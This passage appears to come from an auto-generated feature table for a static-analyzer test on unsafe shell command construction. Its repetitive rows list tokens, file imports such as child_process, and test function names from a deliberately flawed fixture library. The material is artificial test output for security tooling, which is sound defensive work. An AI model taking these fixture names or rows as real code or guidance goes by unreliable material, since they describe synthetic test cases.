name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:462:7:462:11 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:18 | configurable | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:18 | configurable | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:18 | configurable | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:18 | configurable | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:18 | configurable | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:7:463:24 | configurable: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | InputAccessPathFromCallee | 1.?.configurable | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | assignedToPropName | configurable | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:463:21:463:24 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:467:4:467:5 | {} | CalleeFlexibleAccessPath | Object.entries().reduce | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:467:4:467:5 | {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:467:4:467:5 | {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:467:4:467:5 | {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:467:4:467:5 | {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:10 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:10 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:10 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path = ... 'path') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path = ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:7:472:28 | path = ... 'path') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:20 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:20 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | exceptional return of require('path') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | exceptional return of require('path') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | require('path') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | require('path') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:22:472:27 | 'path' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:17 | {promisify} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:17 | {promisify} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:17 | {promisify} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | promisify | contextFunctionInterfaces | 